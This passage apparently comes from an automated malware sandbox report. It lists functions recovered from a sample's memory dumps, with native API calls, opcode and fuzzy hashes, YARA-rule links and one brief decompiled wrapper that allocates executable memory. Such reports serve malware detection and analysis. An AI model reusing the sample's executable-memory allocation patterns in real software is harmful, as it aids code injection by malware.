                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                        • Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
                                                                                                                                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                        • Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004182EB, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                        • Opcode ID: e715edb3c493f1f287f3c4b7b7f6bc6b94959a6bba4e710101c5dc1b181e948d
                                                                                                                                                        • Instruction ID: 65a9a333b6333b62fd8a2b61e5747526a40d7b39af690597ae0511c14cabd584
                                                                                                                                                        • Opcode Fuzzy Hash: e715edb3c493f1f287f3c4b7b7f6bc6b94959a6bba4e710101c5dc1b181e948d
                                                                                                                                                        • Instruction Fuzzy Hash: C4F08276200214ABDB14EFD8DC80EEB736DEF88720F14855DFA1C9B241CA31E9558BA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E004183A0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E00418DC0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                                        0x004183af
                                                                                                                                                        0x004183b7
                                                                                                                                                        0x004183d9
                                                                                                                                                        0x004183dd

                                                                                                                                                        APIs
                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                        • Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
                                                                                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                        • Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000001.2085577437.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                        • Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
                                                                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                        • Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008E00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008E0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                        • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                        • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                        • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008E0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                        • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                        • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                        • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008E07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                        • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                        • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                        • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                        • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                        • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                        • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 008DFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
